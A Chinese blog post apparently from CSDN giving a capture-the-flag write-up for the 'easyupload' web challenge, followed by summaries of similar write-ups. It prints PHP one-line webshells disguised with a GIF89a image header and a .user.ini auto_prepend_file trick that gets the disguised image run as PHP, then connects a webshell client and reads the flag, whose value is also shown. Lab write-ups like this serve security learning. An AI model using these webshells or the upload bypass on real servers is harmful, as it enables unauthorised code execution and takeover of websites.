攻防世界(CTF)~web-easyupload

已于 2024-04-20 18:51:16 修改
阅读量858 收藏 2
点赞数 24
分类专栏: CTF 文章标签: 安全 网络安全
于 2024-04-20 14:26:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75030189/article/details/137997225
版权

这题很明显是一题文件上传的题目

直接先上传一个带一句话木马的文件后缀名为.jpg,然后brupsuit抓包看一下,GIF89a是文件头欺骗,小白我做文件上传是习惯性带上,有利无害

GIF89a
<?php
eval($_POST[cmd]);
?>

上传失败,这里我把木马删除发了一次包是成功的,说明不是文件后缀的问题,木马被过滤了

改一下木马试了一下,成功上传

GIF89a
<?=eval($_POST[cmd]);

访问看一下,虽然上传成功了,但这样很明显无法getshell,没有被解析

这里小白我尝试了很多绕过,但是都无法成功,这个时候想到了一个知识点".user.ini"绕过

那么什么是.user.ini绕过呢?
.user.ini中两个中的配置是“auto_prepend_file”和“auto_append_file”
用我自己的理解就是在同一个目录下如果存在.user.ini文件,并且设置了对象,那么在执行这个目录下的php文件的时候就会自动包含另一个设置的文件

上传一张正常的照片平且F12查看网络模块发现在uploads目录下有一个index.php文件,这样正好符合我们的要求

.user.ini文件内容

auto_prepend_file=123.jpg

 先上传.user.ini文件,这里注意Content文件格式要是照片的格式不然上传不进去,同时GIF89a头也要加上

然后上传一句话木马

然后直接连接蚁剑就行了

根目录下就是flag

cyberpeace{b0843f3a418ed4586611650159e8b77b}

【web | CTF攻防世界 easyupload
weixin_46301214的博客
01-31 880
天命:好像也不太easy首先判断只能上传图片格式的话,那只能通过其他漏洞来把图片解析成php才能构成漏洞了看了一下别人wp,原来是利用php的配置文件来实现漏洞攻击php的 user.ini 配置文件里,有一个参数是在文件运行前把某个文件包含进来的我们只需要做一个局部配置文件,即可触发效果然后上传图片,把图片包含进来即可就相当于触发了文件包含漏洞。
CTF-WEB篇 攻防世界题目实战解析easyupload
2301_76565920的博客
04-23 2350
题目:easyupload 难度:1知识点:上传漏洞,服务器防护绕过,后门,.user.ini,auto_prepend_file的使用
攻防世界 easyupload
rev1ve的博客
03-09 813
ctf攻防世界 easyupload web
Easyupload攻防世界
xyh000001的博客
06-30 774
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。把Content-Type: application/octet-stream改成。我打/直接拉到最下面有flag点进去就是答案了。上传a.jpg这样才算成功(如图)。1.新建.user.ini文件。用蚁剑连接(每个人的都不一样)上传上面的文件用BURP抓包。新建a.txt文件,内容为。保存后把文件名改成.jpg。F12打开网络找到网址。
攻防世界easyupload
m0_73303597的博客
11-10 528
自用
攻防世界--easyupload
qq_73611185的博客
09-16 1034
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十题。
攻防世界CTF|web方向】第一题:Training-WWW-Robots
最新发布
weixin_70825534的博客
07-24 686
如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。1.做题技巧层面:有时flag会出现一些相似的变形,比如这道题中的fl0g,不要忽视了。如果您希望搜索引擎收录网站上所有内容,请勿建立 robots.txt文件。3.尝试访问:本题目场景的网页下的robots.txt文件,得到如下界面。,如同守门人无法阻止窃贼等恶意闯入者,是一个类似于君子协议的文件。形式:在网站根目录下的robots.txt文件。的内容时,才需要使用。
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
攻防世界easyupload
小缪的博客
06-10 4172
知识点:文件上传漏洞。
easyupload(攻防世界)
热门推荐
m0_56107268的博客
11-15 1万+
.user.ini 学习
[攻防世界] easyupload
m0_75178803的博客
04-02 717
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
攻防世界-easyupload
m0_62094846的博客
10-10 3121
上传php文件不行, 修改Content-Type: image/jpeg也不行,把文件名改成jpg才可以,还有头文件也有验证,也要改(这里直接上传正常的jpg文件比较好)然后可以上传成功,但是试过文件名的各种绕过形式,都不能把php上传,就算上传了也不能在蚁剑上读取。这个系统是windows,用user.ini试试(user.ini:把文件当作php文件解析)(index.php是uploads下的php文件,用它读取5.jpg下的文件)然后输入木马,这里尝试过后php也是被过滤的,用缩减版。
攻防世界-web-easyupload
wuh2333的博客
04-09 1162
攻防世界,文件上传
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 740
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界--WEB--easyupload
m0_65766842的博客
03-30 409
但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头。因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项。连接成功之后,我们在根目录下发现了flag文件,打开得到flag。此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。先传user.ini再传a.jpg。
攻防世界web-----easyupload
2201_75556700的博客
01-02 875
这道题对小白的我来说还是很难的,做出这道题我也是看了很多的解答后自己重新试了一遍(我是在window下进行的,在kali稍微有点不一样,就是那个.user.ini得改为user.ini之后再在抓包那里修改为.user.ini就好了(就是第二步))之所以有点不一样是因为kali中"."开头会隐藏。1.首先我们需要上传两个文件,一个是.user.ini另一个是a.jpg(a可以随意命名)2.接下来先上传.user.ini文件之后用burp抓包。3.然后再上传a.jpg文件。.user.ini的内容为。
攻防世界easyupload
Fightever_的博客
09-16 970
由此可见前端会拒绝.php文件,再试一试php,phtml.php3,都不行。既然.php相关文件上传不了,那么就使用.user.ini文件构成PHP后门。得到flag:cyberpeace{53323ec74855788f46d49ae43f72eff3}根据题目easyupload知道该题是一个文件上传漏洞,先上传一张正确的图片,看看服务器回显。上传一个PHP文件,发现上传失败。在上传一张包含PHP内容的图片。.user.ini文件内容。接下来用中国蚁剑去连接一下。
攻防世界CTF杂项挑战详解
资源摘要信息:"攻防世界是一个以网络安全攻防竞技为主的在线平台,而CTF(Capture The Flag,夺旗赛)是一种流行的信息安全竞赛。在这个平台上,参赛者会遇到各种类型的问题,其中包括杂项(misc)类别。杂项题目...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值